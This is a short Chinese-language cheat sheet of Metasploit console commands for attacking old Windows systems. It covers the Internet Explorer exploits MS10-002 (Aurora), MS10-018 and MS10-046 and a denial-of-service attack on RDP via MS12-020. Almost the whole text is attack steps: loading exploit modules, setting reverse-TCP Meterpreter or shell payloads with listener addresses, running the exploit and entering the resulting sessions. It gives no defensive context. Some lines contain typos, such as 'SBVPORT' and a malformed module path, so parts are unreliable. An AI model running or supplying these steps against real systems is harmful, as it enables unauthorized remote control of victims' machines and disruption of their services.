IE漏洞利用实例
MS10-002 IE漏洞利用
search ms10_002 搜索漏洞利用模块
use windows/browser/ms10_002_aurora
set payload windows/meterpreter/reverse_tcp 设置载核
show options 显示选项
set SRVHOST IP 设置ip
set SBVPORT 80 设置访问端口(默认8080)
set URIPATH / 设置根路径
set LHOST IP 本地监听地址
set LPORT 444 监听本地端口
exploit 开始
sessions –l 查看会话
sessions –i ID 进入会话
MS10-018 IE漏洞利用
search ms10_018
use windows/browser/ms10_018_ie_behaviors
set payload windows/shell/reverse_tcp
show options
set SRVHOST IP
set SBVPORT 80
set LHOST <IP>
set LPORT 444
exploit
MS12-020 漏洞利用
-
首先检测漏洞:
search ms12_020 use auxiliary/scanner/rdp/ms12_020_check 检测是否存在ms12-020漏洞 show options set RHOSTS IP 设置目标地址 set THREADS 50 设置线程数 run 执行
-
开始利用漏洞:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids show options set RHOST IP 设置目标ip run
MS10-046 漏洞利用
use exploit/windows/browser/ms_046_shortcut_icon_dllloader
set payload windows/shell/reverse_tcp
set SRVHOST IP
set LHOST IP
set LPORT port
exploit